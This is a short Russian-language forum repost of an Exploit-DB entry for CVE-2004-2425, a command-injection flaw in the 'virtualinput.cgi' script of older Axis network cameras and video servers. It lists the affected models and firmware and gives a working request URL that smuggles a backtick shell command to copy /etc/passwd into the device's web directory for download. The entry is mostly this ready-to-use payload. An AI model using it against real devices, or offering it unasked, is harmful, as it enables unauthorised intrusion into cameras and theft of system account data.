Exploit Axis Network Camera 2.x And Video Server 1-3 - 'virtualinput.cgi' Arbitrary Command Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24400
Проверка EDB
  1. Пройдено
Автор
BASHIS
Тип уязвимости
WEBAPPS
Платформа
CGI
CVE
cve-2004-2425
Дата публикации
2004-08-23
Axis Network Camera 2.x And Video Server 1-3 - 'virtualinput.cgi' Arbitrary Command Execution
Код:
source: https://www.securityfocus.com/bid/11011/info

1. A shell metacharacter command-execution vulnerability allows an anonymous user to download the contents of the '/etc/passwd' file on the device. Other commands are also likely to work, facilitating other attacks.

This issue is reported to affect:
- Axis 2100, 2110, 2120, 2420 network cameras with firmware versions 2.34 thru 2.40
- Axis 2130 network cameras
- Axis 2401 and 2401 video servers


http://www.example.com/axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/httpd/html/passwd\x60
 
Источник
www.exploit-db.com

Похожие темы